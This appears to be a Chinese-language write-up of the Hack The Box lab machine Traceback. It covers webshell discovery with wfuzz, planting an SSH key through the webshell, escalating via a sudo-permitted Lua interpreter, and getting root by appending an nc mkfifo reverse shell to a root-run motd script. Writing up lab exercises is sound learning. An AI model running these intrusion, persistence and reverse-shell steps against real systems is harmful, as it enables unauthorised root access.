概述
目标靶机是一台Linux机器,部署了一个网站,但是网站被人日了,黑客留下了一些线索和工具在服务上,我们需要利用这些线索和工具拿到root
和flag。先通过社工找到黑客的信息,从他的github上找到一些webshell的线索,然后用wfuzz
找到黑客传到目标站点的webshell
,利用webshell可以拿到webadmin
账号权限,然后通过主机上的线索找到一个执行lua
脚本提升权限的通道进而获取到另一个高权限的账号sysadmin
,再通过pspy
监控发现本地有一些使用特权执行的定时任务脚本,修改脚本执行反弹shell获取到root权限。
信息收集
root@vultr:~/htb# nmap -sV -sC 10.10.10.181
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-28 08:06 UTC
Nmap scan report for 10.10.10.181
Host is up (0.076s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
416/tcp filtered silverplatter
1011/tcp filtered unknown
1130/tcp filtered casp
1521/tcp filtered oracle
2119/tcp filtered gsigatekeeper
3476/tcp filtered nppmp
4900/tcp filtered hfcs
5440/tcp filtered unknown
5903/tcp filtered vnc-3
6580/tcp filtered parsec-master
7741/tcp filtered scriptview
8292/tcp filtered blp3
32773/tcp filtered sometimes-rpc9
52869/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.32 seconds
用浏览器访问目标网站,发现页面已经被人日了,从页面留下的信息看Xh4H
可能是黑客的名字(目标网站是80段,我本地做了映射)
google这个名字找到了对方的github账号,里面有一个工程Web-Shells。根据目标网站的提示,说黑客留了一些后门在这里,索性把这个工程下的webshell名字作为字典尝试爆破目录
root@vultr:~/htb# cat fuzz.txt
alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php
爆破
使用wfuzz
爆破目录,果然找到对方使用的webshell文件smevk.php
root@vultr:~/htb# wfuzz -w ./fuzz.txt -u http://10.10.10.181/FUZZ --hc 404,403
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.181/FUZZ
Total requests: 17
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000017: C=200 44 L 151 W 1113 Ch ""
000015: C=200 58 L 100 W 1261 Ch "smevk.php"
Total time: 0.241917
Processed Requests: 17
Filtered Requests: 15
Requests/sec.: 70.27192
用浏览器访问之,发现是一个功能很全面的webshell,查看发现当前用户是webadmin
,为了保证连接的稳定性,我们在/home/webadmin/.ssh
下面放一个公钥,本机利用私钥登录
先在本机生成公私钥对
root@vultr:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:2YE9x2+Eyr/bU1JkYYAbvgxxVvScvIBB1kV0qBUnWR0 root@vultr.guest
The key's randomart image is:
+---[RSA 2048]----+
| .+=+BEB|
| +.*ooOo*|
| . O.*+.B |
| = B.o. o|
| S * . oo |
| + .. .|
| . o |
| o. |
| o... |
+----[SHA256]-----+
root@vultr:~# ls -l /root/.ssh/
total 12
-rw------- 1 root root 1823 May 28 08:39 id_rsa
-rw-r--r-- 1 root root 398 May 28 08:39 id_rsa.pub
-rw-r--r-- 1 root root 666 May 28 03:03 known_hosts
把公钥的文件的内容copy出来,保存成文件authorized_keys
,然后利用webshall直接上传至/home/webadmin/.ssh
,接下来就可以直接用私钥+ssh登录了。
在家目录下找到一些线索,note.txt
提到了lua
,然后我们在.bash_history
找到了一些操作记录,看起来是要使用/home/sysadmin/luvit
执行privesc.lua
脚本,但是经过一通查找,却并没有找到这两个文件的位置,并且webadmin账号没有权限读取sysadmin下面的文件
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu May 28 01:48:57 2020 from 10.10.14.101
webadmin@traceback:~$ whoami
webadmin
webadmin@traceback:~$
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
提权
使用sudo -l
查看发现,我们要找的问题件可以无密码读取,正好这个时候不知道哪位老哥在家目录下创建了一个lua
文件获取bash,内容就一句话os.execute("/bin/bash")
。
根据前面获得的提示,执行 sudo -u sysadmin /home/sysadmin/luvit script.lua
可以直接切到sysadmin
的bash,移动到sysadmin的家目录可以获取到user.txt
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit script.lua
sysadmin@traceback:~$ whoami
sysadmin
sysadmin@traceback:~$ cd ../sysadmin
sysadmin@traceback:/home/sysadmin$ ls -la
total 4336
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 03:53 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
-rw------- 1 sysadmin sysadmin 33 May 28 01:33 user.txt
sysadmin@traceback:/home/sysadmin$
接下来要尝试获取root权限,这里用到pspy监视进程,这个工具可以在普通用户权限下观察到其他用户执行的命令
观察一会发现,目标机器每30秒会执行一个cp命令,把一些文件从backup目录复制到/etc/update-motd.d/
/bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
移动到这个目录下,发现000-header里面的内容正好就是ssh登录的时候显示的信息,并且从pspy监控的信息看来,当用ssh登录的时候这里会自动执行
sh -c uname -a; w; id; /bin/sh -i
正好与这个脚本吻合,可以在后面加一行id
来验证
sysadmin@traceback:~$ cd /etc/update-motd.d/
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"
id
最后,我们可以确定ssh登录时候会触发用root执行这个脚本,所以我们在这里加一个nc的反弹shell,在00-header里面添加rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.94 8888 >/tmp/f
同时在本机开启监听nc -lvp 8888
,获取到root的反弹shell